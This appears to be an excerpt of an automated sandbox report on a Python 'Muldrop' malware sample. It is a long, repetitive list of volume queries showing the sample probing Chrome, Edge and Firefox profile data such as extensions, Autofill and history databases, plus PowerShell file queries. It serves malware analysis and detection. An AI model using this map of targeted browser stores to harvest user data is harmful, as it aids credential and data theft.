              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\en_CA VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\en_GB VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\en_US VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\CertificateRevocation VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\CertificateRevocation\6498.2023.8.1 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\attachments VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AssistanceHome VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AutofillStrikeDatabase VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\blob_storage VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\blob_storage\21262822-6a68-4458-bd75-71865ae821a7 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\BudgetDatabase VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ms VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\wasm VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\wasm\index-dir VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\commerce_subscription_db VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Download Service VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Download Service\Files VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeEDrop VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\af VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\am VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ar VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\az VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\be VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\bn VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\zh_CN VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ca VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\permissions.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\hu VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\id VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ar VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ka VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\az VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\it VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\bg VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\zh_TW VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\zu VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\iw VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\places.sqlite VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\kk VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\bn VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Autofill VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Autofill\4.0.0.8 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ja VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ka VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\AutoLaunchProtocolsComponent VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\kk VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\km VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\kn VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AssistanceHome VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\wasm VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Download Service\Files VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgePushStorageWithConnectTokenAndKey VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_metadata VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0 VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ms VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\my VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ne VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Volume information queries (the count in parentheses is the number of identical entries in the report):

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat (2)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat (13)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll (2)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll (2)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll (2)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ (2)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat (1)
